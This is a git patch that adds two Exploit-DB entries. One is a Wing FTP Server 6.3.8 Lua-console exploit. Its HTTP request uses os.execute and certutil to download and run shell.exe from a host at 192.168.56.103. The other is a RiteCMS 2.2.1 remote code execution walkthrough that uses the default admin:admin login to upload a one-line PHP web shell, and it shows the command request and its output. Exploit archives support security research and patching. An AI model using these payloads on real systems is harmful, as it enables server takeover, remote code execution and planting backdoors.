From da1d7301afa92fac408daca87741e1580b8f0f38 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 17 Jul 2020 05:02:11 +0000
Subject: [PATCH] DB: 2020-07-17

2 changes to exploits/shellcodes

RiteCMS 2.2.1 - Remote Code Execution
Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
---
 exploits/lua/webapps/48676.txt | 27 +++++++++++++++++++++++
 exploits/php/webapps/48675.txt | 40 ++++++++++++++++++++++++++++++++++
 files_exploits.csv             |  2 ++
 3 files changed, 69 insertions(+)
 create mode 100644 exploits/lua/webapps/48676.txt
 create mode 100644 exploits/php/webapps/48675.txt

diff --git a/exploits/lua/webapps/48676.txt b/exploits/lua/webapps/48676.txt
new file mode 100644
index 000000000..1ef32dc71
--- /dev/null
+++ b/exploits/lua/webapps/48676.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
+# Date: 2020-06-26
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: https://www.wftpserver.com/
+# Software Link: https://www.wftpserver.com/download.htm
+# Version: 6.3.8
+# Tested on: Windows 10
+# CVE : --
+
+Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell.
+
+1) Generate your payload (e.g. msfvenom)
+2) Send and execute via POST
+
+POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1
+Host: 192.168.56.105:5466
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.56.105:5466/admin_lua_term.html
+Content-Type: text/plain;charset=UTF-8
+Content-Length: 153
+Connection: close
+Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5
+
+command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
\ No newline at end of file
diff --git a/exploits/php/webapps/48675.txt b/exploits/php/webapps/48675.txt
new file mode 100644
index 000000000..e2329a0a2
--- /dev/null
+++ b/exploits/php/webapps/48675.txt
@@ -0,0 +1,40 @@
+# Exploit Title: RiteCMS 2.2.1 - Remote Code Execution
+# Date: 2020-07-03
+# Exploit Author: Enes Özeser
+# Vendor Homepage: http://ritecms.com/
+# Version: 2.2.1
+# Tested on: Linux
+
+1- Go to following url. >> http://(CHANGE-THIS)/ritecms/cms/
+2- Default username and password is admin:admin.
+3- Go "Filemanager" and press "Upload file" button.
+4- Choose your php webshell script and upload it. 
+
+((Example PHP Web Shell Code)) 
+<?php echo "<pre>"; system($_GET['cmd']); ?>
+
+5- You can find uploaded file there. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php
+6- We can execute a command now. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php?cmd=whoami
+
+(( REQUEST ))
+
+GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/ritecms/cms/index.php?mode=filemanager&directory=media
+Connection: close
+Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
+Upgrade-Insecure-Requests: 1
+
+(( RESPONSE ))
+
+HTTP/1.1 200 OK
+Date: Fri, 03 Jul 2020 21:10:13 GMT
+Server: Apache/2.4.43 (Debian)
+Content-Length: 14
+Connection: close
+Content-Type: text/html; charset=UTF-8
+<pre>www-data
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3650ffcef..6de805545 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42922,3 +42922,5 @@ id,file,description,date,author,type,platform,port
 48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
+48675,exploits/php/webapps/48675.txt,"RiteCMS 2.2.1 - Remote Code Execution",2020-07-16,"Enes Özeser",webapps,php,
+48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,